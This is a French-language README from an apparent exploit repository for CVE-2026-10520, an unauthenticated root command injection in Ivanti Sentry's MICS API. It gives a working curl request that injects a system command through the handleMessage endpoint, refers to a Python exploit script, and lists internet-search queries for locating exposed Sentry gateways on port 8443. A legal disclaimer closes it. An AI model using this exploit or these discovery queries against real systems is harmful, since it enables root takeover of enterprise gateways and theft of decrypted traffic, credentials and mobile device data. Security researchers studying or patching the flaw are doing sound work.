
RCE au niveau racine via l'injection de commandes système dans Ivanti Sentry
Ivanti Sentry (anciennement MobileIron Sentry) est une passerelle de sécurité d'entreprise qui proxy le trafic entre les appareils mobiles et les ressources back-end de l'entreprise : courrier électronique, SharePoint et applications web internes. Elle applique les politiques de gestion des appareils mobiles (MDM), termine les sessions mobiles chiffrées et délivre une authentification basée sur des certificats pour les déploiements d'applications d'entreprise. Les instances de Sentry sont généralement exposées sur internet via le port8443, exposant ainsi l'API d'administration MICS (Mobile Iron Configuration Service).
CVE-2026-10520 est une vulnérabilité d'injection de commande système
sans authentification affectant Ivanti Sentry avant les versions
R10.5.2, R10.6.2 et R10.7.1 (CVSSv3.1 : 10 Critique, listé dans le
catalogue KEV de la CISA). La faille se situe dans le point de terminaison
MICS API /mics/api/v2/sentry/mics-config/handleMessage, qui accepte
des commandes système encapsulées en XML via un corps de requête
POST message encodé URL sans aucune authentification ni validation
d’entrée. Un attaquant accédant à un point de terminaison vulnérable peut
exécuter des commandes système arbitraires en tant que root, obtenant
ainsi le contrôle total de l’hôte — y compris le trafic d’entreprise
déchiffré, les identifiants stockés et toutes les données des appareils
mobiles gérés.
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443Ce dépôt et son contenu sont fournis strictement à des fins de recherche en sécurité légitime, de tests d’intrusion autorisés, d’étude éducative et de défense. En accédant ou en utilisant ce matériel, vous reconnaissez l’entière responsabilité de veiller à ce que vos activités soient conformes à toutes les lois en vigueur et à ce que vous ayez obtenu une autorisation appropriée avant de tester ou d’appliquer ces techniques sur tout système que vous ne possédez pas.
Les auteurs et mainteneurs de ce projet déclinent toute responsabilité pour tout dommage, conséquence juridique ou mauvaise utilisation résultant de l’application de ces informations. Toute utilisation pour un accès non autorisé, une activité malveillante ou des fins illégales est expressément interdite et non prise en charge.
Utilisez de manière responsable. Restez dans la légalité. Testez uniquement ce que vous possédez ou pour lequel vous avez une autorisation écrite explicite.
SCT-PL